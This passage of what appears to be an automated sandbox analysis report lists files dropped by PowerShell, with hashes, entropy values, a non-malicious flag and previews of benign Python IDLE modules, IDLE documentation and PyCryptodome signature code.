                                                                                                                                                                                                                      Preview:import importlib.abc..import importlib.util..import os..import platform..import re..import string..import sys..import tokenize..import traceback..import webbrowser....from tkinter import *..from tkinter.font import Font..from tkinter.ttk import Scrollbar..from tkinter import simpledialog..from tkinter import messagebox....from idlelib.config import idleConf..from idlelib import configdialog..from idlelib import grep..from idlelib import help..from idlelib import help_about..from idlelib import macosx..from idlelib.multicall import MultiCallCreator..from idlelib import pyparse..from idlelib import query..from idlelib import replace..from idlelib import search..from idlelib.tree import wheel_event..from idlelib.util import py_extensions..from idlelib import window....# The default tab setting for a Text widget, in average-width characters...TK_TABWIDTH_DEFAULT = 8.._py_version = ' (%s)' % platform.python_version()..darwin = sys.platform == 'darwin'....def _sphinx_version():.. "Format
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3714
                                                                                                                                                                                                                      Entropy (8bit):4.60398979034345
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:8/aXTVgd9rPU0HKZrGeV53cKxrpLo9E5INf/TXkQViiz:fDVQd1K5Gq5dd9oq+xE6
                                                                                                                                                                                                                      MD5:36DB447A634E4E3BE1853A945ACD5F36
                                                                                                                                                                                                                      SHA1:0142DCF85BEA1B52744FF19E3A4653CD314A12BC
                                                                                                                                                                                                                      SHA-256:13CD4B284B1EFB37E9B99B1362CE31105EF85615187F470CD8E95817990FEE16
                                                                                                                                                                                                                      SHA-512:3E8BA9EDF586A2C5691989B4E769952CF1564428709EFA244E68AD727997753CC2443B07CA828215D39DD69E4D26259D3CDF6D648690270DC3AB265BF10174EC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Writing an IDLE extension..=========================....An IDLE extension can define new key bindings and menu entries for IDLE..edit windows. There is a simple mechanism to load extensions when IDLE..starts up and to attach them to each edit window. (It is also possible..to make other changes to IDLE, but this must be done by editing the IDLE..source code.)....The list of extensions loaded at startup time is configured by editing..the file config-extensions.def. See below for details.....An IDLE extension is defined by a class. Methods of the class define..actions that are invoked by event bindings or menu entries. Class (or..instance) variables define the bindings and menu additions; these are..automatically applied by IDLE when the extension is linked to an edit..window.....An IDLE extension class is instantiated with a single argument,..`editwin', an EditorWindow instance. The extension cannot assume much..about this argument, but it is guaranteed to have the following instance.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4003
                                                                                                                                                                                                                      Entropy (8bit):4.207021866741443
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:gPz/VYEWrUaBkM63fWt+vTvHebQ0dk5rQfuk1oKVmpsv5oLZbkwCJ2nUBCSa4:2Z5n/M7YLve00YELaCJ2nSP
                                                                                                                                                                                                                      MD5:D4382855FDA44E416D6A5B3FA5BC1B81
                                                                                                                                                                                                                      SHA1:3D49EC849E1C17ACA1DFA7C30045FF27A7194160
                                                                                                                                                                                                                      SHA-256:B03FB15A6D2D0E8663C486BC7A1979F0042774936169D4A952EF3D47460AAE58
                                                                                                                                                                                                                      SHA-512:1731C0575F56AB645587E93D1631189D4EB70294EE84CACCFE2543D7294A4729642B9C328E4565094126D628500933CF916BCCC03BB9955CE7311696929AB337
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"idlelib.filelist"....import os..from tkinter import messagebox......class FileList:.... # N.B. this import overridden in PyShellFileList... from idlelib.editor import EditorWindow.... def __init__(self, root):.. self.root = root.. self.dict = {}.. self.inversedict = {}.. self.vars = {} # For EditorWindow.getrawvar (shared Tcl variables).... def open(self, filename, action=None):.. assert filename.. filename = self.canonize(filename).. if os.path.isdir(filename):.. # This can happen when bad filename is passed on command line:.. messagebox.showerror(.. "File Error",.. f"{filename!r} is a directory.",.. master=self.root).. return None.. key = os.path.normcase(filename).. if key in self.dict:.. edit = self.dict[key].. edit.top.wakeup().. return edit.. if action:.. # Don't create window,
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):16203
                                                                                                                                                                                                                      Entropy (8bit):4.42252260069076
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:nkiP6I6SEvtzLKlHIawt4Jw8LhM6G4+4DKm+hqmEg08c9/51:Z967FzqBhr+4DKmaTK7
                                                                                                                                                                                                                      MD5:37BAC954EFFBF63F6828825E49EA4DB8
                                                                                                                                                                                                                      SHA1:6D55ADF78D55363CF106AF6366C91DCE47A20516
                                                                                                                                                                                                                      SHA-256:54A083AB464BB220BD30AB3CE6C7BB0DA43CD1B45BD13AB77DC62F2A8A3F7ABB
                                                                                                                                                                                                                      SHA-512:B2926922AAF9A4DC5BA1AE909E6E6A82CE4D66C8CE54C0D0060CA09CEBA2A9AAA040B738196BBD51FFA7D9C4C761E42A4A885E865C9A5409D6A134F3F6BFC3F3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Format all or a selected region (line slice) of text.....Region formatting options: paragraph, comment block, indent, deindent,..comment, uncomment, tabify, and untabify.....File renamed from paragraph.py with functions added from editor.py..."""..import re..from tkinter.messagebox import askyesno..from tkinter.simpledialog import askinteger..from idlelib.config import idleConf......class FormatParagraph:.. """Format a paragraph, comment block, or selection to a max width..... Does basic, standard text formatting, and also understands Python.. comment blocks. Thus, for editing Python source code, this.. extension is really only suitable for reformatting these comment.. blocks or triple-quoted strings..... Known problems with comment reformatting:.. * If there is a selection marked, and the first line of the.. selection is not complete, the block will probably not be detected.. as comments, and will have the normal "text formatting" rules.. applied
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7749
                                                                                                                                                                                                                      Entropy (8bit):4.468786627179708
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:n5RTyoPFkmWjHjNHj02NHxwT+O3w2XaobMCUf:n5pPF+HjNHjJFxwTY2XMN
                                                                                                                                                                                                                      MD5:E95CEFA5EB6652460BEECBC8504EE2D0
                                                                                                                                                                                                                      SHA1:544D15DB8D1AA4EC2CBAEA165A07F2C70EE47C68
                                                                                                                                                                                                                      SHA-256:0B3B593AEF9E61EBB8E498513CB83A5FACD369682526FB8518B093F9EBBADFFE
                                                                                                                                                                                                                      SHA-512:758BE08B41733F3A4E2FD5296DF07EEA1C6930EF7E8C3458F2324660F0D9748A86983121DE982D8C525506A543DF074CFBAC22952815575EC8A119D4F7C92C7E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Grep dialog for Find in Files functionality..... Inherits from SearchDialogBase for GUI and uses searchuser.. to prepare search pattern..."""..import fnmatch..import os..import sys....from tkinter import StringVar, BooleanVar..from tkinter.ttk import Checkbutton # Frame imported in ...Base....from idlelib.searchbase import SearchDialogBase..from idlelib import searchuser....# Importing OutputWindow here fails due to import loop..# EditorWindow -> GrepDialog -> OutputWindow -> EditorWindow......def grep(text, io=None, flist=None):.. """Open the Find in Files dialog..... Module-level function to access the singleton GrepDialog.. instance and open the dialog. If text is selected, it is.. used as the search phrase; otherwise, the previous entry.. is used..... Args:.. text: Text widget that contains the selected text for.. default search phrase... io: iomenu.IOBinding instance with default path to search... flist: filelist.Fil
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (705), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):79716
                                                                                                                                                                                                                      Entropy (8bit):4.886904990290506
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:rYyOy9JM9NKx4LU75ncN3PTvZOGt/A3+KSFqFuCsHkutcFhxw39N2E9ySFM+76x4:rYyBM9GsDo339FuFNcFhxwtN2CM+76x4
                                                                                                                                                                                                                      MD5:5ABB254EDF8D80E2998AB9C6EAFE4F35
                                                                                                                                                                                                                      SHA1:7747C548418D86A9DF0F72C8E0D1532C5AE1CA42
                                                                                                                                                                                                                      SHA-256:1D49FBC6F172E2178AF8DB2FC9D8505863F7AC227410603CCF8E79422465BC2C
                                                                                                                                                                                                                      SHA-512:694228D1BB653A58C477776258FE66C32C0E2F011B736A3F5887E9A308E93297D0806B2D38D7C222AA699452647B6525EEFFBFE1E23B0C76199FAC126EDE2DD5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<!DOCTYPE html>....<html lang="en">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />.... <title>IDLE &#8212; Python 3.13.0a2 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.... <link rel="stylesheet" type="text/css" href="../_static/pygments.css" />.. <link rel="stylesheet" type="text/css" href="../_static/pydoctheme.css?digest=b37c26da2f7529d09fe70b41c4b2133fe4931a90" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="../_static/pygments_dark.css" />.... <script data-url_root="../" id="documentation_options" src="../_static/documentation_options.js"></script>.. <script src="../_static/doctools.js"></script>.. <script src="../_static/sphinx_highlight.js"></script>.... <script src="../_static/sidebar.js"></script>.... <lin
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12199
                                                                                                                                                                                                                      Entropy (8bit):4.572783572616958
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:NTaZUUbpzl/llYhy///G8/L/mgSRGfkQmluQXr11C3vFUzCbsIa9O4MWptiT:NTCzihBdgScMQm5bCfFUWb54MWe
                                                                                                                                                                                                                      MD5:A376B76C8EB01E5D5CEDD4D0C8CD8174
                                                                                                                                                                                                                      SHA1:8E551D26B4CD40F59516B805D16937FF998D45FA
                                                                                                                                                                                                                      SHA-256:81BC2D7E1CD65D23C452E939A97D741F05E95DA13C769BACC1FF64C21B9C57E6
                                                                                                                                                                                                                      SHA-512:12C8A8F5419602C1CFA3488680A1DC2E39EBC1837332AE7F2555B1F476651BDBB5D205DF96DE7B8D7DF1613574275ADFFCFE98B50FCF50D1911A24E03FFAB3CB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:""" help.py: Implement the Idle help menu...Contents are subject to revision at any time, without notice.......Help => About IDLE: display About Idle dialog....<to be moved here from help_about.py>......Help => IDLE Help: Display help.html with proper formatting...Doc/library/idle.rst (Sphinx)=> Doc/build/html/library/idle.html..(help.copy_strip)=> Lib/idlelib/help.html....HelpParser - Parse help.html and render to tk Text.....HelpText - Display formatted help.html.....HelpFrame - Contain text, scrollbar, and table-of-contents...(This will be needed for display in a future tabbed window.)....HelpWindow - Display HelpFrame in a standalone window.....copy_strip - Copy idle.html to help.html, rstripping each line.....show_idlehelp - Create HelpWindow. Called in EditorWindow.help_dialog..."""..from html.parser import HTMLParser..from os.path import abspath, dirname, isfile, join..from platform import python_version....from tkinter import Toplevel, Text, Menu..from tkinter.ttk import Frame
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9117
                                                                                                                                                                                                                      Entropy (8bit):4.723161797093185
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:5SEtseI9/9svJdIeePT2TY3/6SAD+mzWy7:5SEtseI52JEFQ0m
                                                                                                                                                                                                                      MD5:D9884EB23FBB91B967723927F31E5EFE
                                                                                                                                                                                                                      SHA1:B08A4DD5FA6754227906DE47F1423049F99303ED
                                                                                                                                                                                                                      SHA-256:8F136253B4233E3CBB5CE5D58F824C7FBF3FE9F0C3F1A19107E0BC59EA49002C
                                                                                                                                                                                                                      SHA-512:AE2C9D3276CBFA2C0E15BACAF2F7DF0DCF9B8339065626E7ED6B9BEBC913895F0165893B2CAC11F51B0DF0601E54BF883AE2B438CED628FCA5CC45D9D4E95B37
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""About Dialog for IDLE...."""..import os..import sys..import webbrowser..from platform import python_version, architecture....from tkinter import Toplevel, Frame, Label, Button, PhotoImage..from tkinter import SUNKEN, TOP, BOTTOM, LEFT, X, BOTH, W, EW, NSEW, E....from idlelib import textview....pyver = python_version()....if sys.platform == 'darwin':.. bits = '64' if sys.maxsize > 2**32 else '32'..else:.. bits = architecture()[0][:2]......class AboutDialog(Toplevel):.. """Modal about dialog for idle.... """.. def __init__(self, parent, title=None, *, _htest=False, _utest=False):.. """Create popup, do not return until tk widget destroyed..... parent - parent of this dialog.. title - string which is title of popup dialog.. _htest - bool, change box location when running htest.. _utest - bool, don't wait_window when running unittest.. """.. Toplevel.__init__(self, parent).. self.configure(borderwidth=5).. # pl
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4171
                                                                                                                                                                                                                      Entropy (8bit):4.2750575677314435
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:ceiwzgHikkV5iHAqYIOYtUQG1xmKu/85OjTY:YtCku5ZwQ1MjTY
                                                                                                                                                                                                                      MD5:1A972A5E01BB31ECCB1BA34268D6D8C0
                                                                                                                                                                                                                      SHA1:5A012623597A3BE9A964D169BFC2C65176CB433C
                                                                                                                                                                                                                      SHA-256:3AA21FEC9E929F5D7EE6EEB9334E03317198BB3DE054BB7B216FD62DC8FBF48A
                                                                                                                                                                                                                      SHA-512:E97F439DF742F3E17C6E2EF0E51B91A76607F54A55907909D0061B3B7129A9BF224BE97A7D3E2517F511FC85CB7DE3AF1C8283B995D97ADE4652468AD20FE441
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"Implement Idle Shell history mechanism with History class"....from idlelib.config import idleConf......class History:.. ''' Implement Idle Shell history mechanism..... store - Store source statement (called from pyshell.resetoutput)... fetch - Fetch stored statement matching prefix already entered... history_next - Bound to <<history-next>> event (default Alt-N)... history_prev - Bound to <<history-prev>> event (default Alt-P)... '''.. def __init__(self, text):.. '''Initialize data attributes and bind event methods..... .text - Idle wrapper of tk Text widget, with .bell()... .history - source statements, possibly with multiple lines... .prefix - source already entered at prompt; filters history list... .pointer - index into history... .cyclic - wrap around history list (or not)... '''.. self.text = text.. self.history = [].. self.prefix = None.. self.pointer = None.. self.cyclic =
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13201
                                                                                                                                                                                                                      Entropy (8bit):4.307302801691667
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:zJYtNTKgPZJ/CopzxZircN5LLrJf5G7FX06udUMIGbYI+LKClV8WaPY:1YtJKcoE0
                                                                                                                                                                                                                      MD5:2595A7F08ABE0200CFAAD7D389895859
                                                                                                                                                                                                                      SHA1:86449239D5175ADE7DBFEEBFD4A732FF71F44C11
                                                                                                                                                                                                                      SHA-256:E81E9177FCF8ACFAE3D47EA8A9552EE4F012CC733E3E4A2043E86856403ABE40
                                                                                                                                                                                                                      SHA-512:E34A316B21DA4E8523BFFC6682192778F4751F3620CF6A218943EC094FB9E915FC58AEA6F88FC92FC2C89936B6DD4450A872B6FFD7FEE6978A124B62404A23C5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Provide advanced parsing abilities for ParenMatch and other extensions.....HyperParser uses PyParser. PyParser mostly gives information on the..proper indentation of code. HyperParser gives additional information on..the structure of code..."""..from keyword import iskeyword..import string....from idlelib import pyparse....# all ASCII chars that may be in an identifier.._ASCII_ID_CHARS = frozenset(string.ascii_letters + string.digits + "_")..# all ASCII chars that may be the first char of an identifier.._ASCII_ID_FIRST_CHARS = frozenset(string.ascii_letters + "_")....# lookup table for whether 7-bit ASCII chars are valid in a Python identifier.._IS_ASCII_ID_CHAR = [(chr(x) in _ASCII_ID_CHARS) for x in range(128)]..# lookup table for whether 7-bit ASCII chars are valid as the first..# char in a Python identifier.._IS_ASCII_ID_FIRST_CHAR = \.. [(chr(x) in _ASCII_ID_FIRST_CHARS) for x in range(128)]......class HyperParser:.. def __init__(self, editwin, index):.. "To init
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2154
                                                                                                                                                                                                                      Entropy (8bit):5.295272514709387
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHs0+mETupY34KepRG1:MwDqrYJALrYJHdt3EHGuI9DjYA3G1
                                                                                                                                                                                                                      MD5:C9AD0C720C157C21F0BDE59A9C570978
                                                                                                                                                                                                                      SHA1:08AD968BE36D338E46DBB26BF8F74508451FA359
                                                                                                                                                                                                                      SHA-256:B54B24BE5330B4EB23A8D0BEF242BD785DFB0F1B31DCBACEB87AF47B73DB5A32
                                                                                                                                                                                                                      SHA-512:79292C6608760748C9030C0C7DEEA4F600A7480AEE20290F5F9E9C55A0162F9C3A014CCD4090694DBAD8322C7FB000813D97DDC9DD7F7E88EBEBBDEDA189AF14
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):895
                                                                                                                                                                                                                      Entropy (8bit):5.021175970297132
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LtZ3XEDf:Jy+1o3xf1ov2GovRLP3s
                                                                                                                                                                                                                      MD5:B10C8861416461026424D8341D6B711B
                                                                                                                                                                                                                      SHA1:9207CD03C8A4F03ADE3FB52D7DD1828E8B734090
                                                                                                                                                                                                                      SHA-256:2B2FB1983B8866D1CA635CDA145BF4639196A83A0F9B8AA7A6D0F0D39913F8F0
                                                                                                                                                                                                                      SHA-512:F99F6E29E7980B548D07A760C116964872909158395D158C9199F5E458952AC37EA2D1645E186ED5EB17B570061F60D2A7A903218C9FADE89D61A5FF4562134C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2042
                                                                                                                                                                                                                      Entropy (8bit):5.32432696462352
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIH20+8bETupt3Tk2dRGM:MwDqrYJALrYJHdt3EHGuIjRjtPGM
                                                                                                                                                                                                                      MD5:7D8BF8D0C4889A5BF6BB4EB95AA44466
                                                                                                                                                                                                                      SHA1:06633D6A4637773198A481EAB9ED156591DB7932
                                                                                                                                                                                                                      SHA-256:0653BE50072749B16247CBB4905BB79FBD877FFC93F51C5B3E59EDC5FEB48E07
                                                                                                                                                                                                                      SHA-512:68B95CBC4A39638FB7462DC391A145EC115BA045F301FEC54A475D134E5A3C93ED3223DD06C8895D2916294FB09A2A54B6D666307053F1AFC443AAF879267806
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):467
                                                                                                                                                                                                                      Entropy (8bit):4.916093935652459
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLtw3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+Ltw3X2
                                                                                                                                                                                                                      MD5:CA5E82193E428D853927F573B9D0AFFD
                                                                                                                                                                                                                      SHA1:D1A94E957421405394C4EA31C15A384E3B758978
                                                                                                                                                                                                                      SHA-256:FCA639E57C49A12AE306A309B29E2D2F49730F65AA23C5FF7DBC031A9EE8D378
                                                                                                                                                                                                                      SHA-512:EEEDB242B966E71847B03C7CBBC519E77BBCB1DCCD2BE1CEE0BBF2A29B9833F22ACCAD774B7F782D4BF3D3F3EDC7B959117252D2C6C21ABFB1678166BE80AF84
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1731
                                                                                                                                                                                                                      Entropy (8bit):5.278283491953278
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHQ+t1v:MwDqrYJALrYJHdt3EHGuIT
                                                                                                                                                                                                                      MD5:60FAD4E2C2EF2BA9BC88934491AB89F8
                                                                                                                                                                                                                      SHA1:45D630681807B431E6A26BF1438B4A477F07BE74
                                                                                                                                                                                                                      SHA-256:2567D9DADE66C8CE9981C1B3856398708FFF5037E6ABBF4C0A9D60AFBD1E8678
                                                                                                                                                                                                                      SHA-512:DDF73D98249043EB96E57121447EAEABB54E31DD35ACEC319FA7195B9DBC03D1B914E4014A023CB5ADC01F5DCB9C981ADF4F962EFAF011B723EC1F6C47CE5D10
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):16702
                                                                                                                                                                                                                      Entropy (8bit):5.447722594814528
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:yk0Uj4v1QgpwECwolewmbxzNrFzwc4dX+P/CYyhfIniZ4y+Cb0:yNUj49XiBlOZRxw3kC/JnB0
                                                                                                                                                                                                                      MD5:F3ACE72BEB9106A3569804C30B0E3138
                                                                                                                                                                                                                      SHA1:E438F9540AD0CB08FDD05064BF986269A6AFB55E
                                                                                                                                                                                                                      SHA-256:B8BBD6C61748C33A2B5B822FA97043C364638D6703D4D47DADCD0DC255DA0CAB
                                                                                                                                                                                                                      SHA-512:B793199825DF8E256AF684D6E3441C7D5D7D5605D86A12CF2BCC0FAE58D0773AA75ABD74B19142661B287D3DA5ACBF032B9144E858F511E5C8C6628DB5F56FBA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........l.eW=.............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d.d...Z.y.)......)...DerSequence)...long_to_bytes)...Integer)...HMAC)...EccKey)...DsaKey..DssSigScheme..newc.....................4.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....zkA (EC)DSA signature object.. Do not instantiate directly.. Use :func:`Crypto.Signature.DSS.new`.. c..........................|.|._.........|.|._.........|.|._.........|.j...................j...........................|._.........|.j...................d.z...d.z...d.z...|._.........y.).z.Create a new Digital Signature Standard (DSS) object... Do not instantiate this object directly,. use `Crypto.Signature.DSS.new` instead.. ..........N)..._key.._encoding.._order..size_in_bits.._order_bits.._order_bytes)...self..key..encoding..orders.... .hC:\Users\Administ
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1107
                                                                                                                                                                                                                      Entropy (8bit):5.315245240539538
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:C69RsnU7cLzFU2xrQFdDDWDbh0YVHAjJLgJrPYuVxhEln:C69RsnU4PFU2x0jDWDbu0UhgJTPVxKn
                                                                                                                                                                                                                      MD5:BF832B386209BE59F0C3A2C8A2A3A9FA
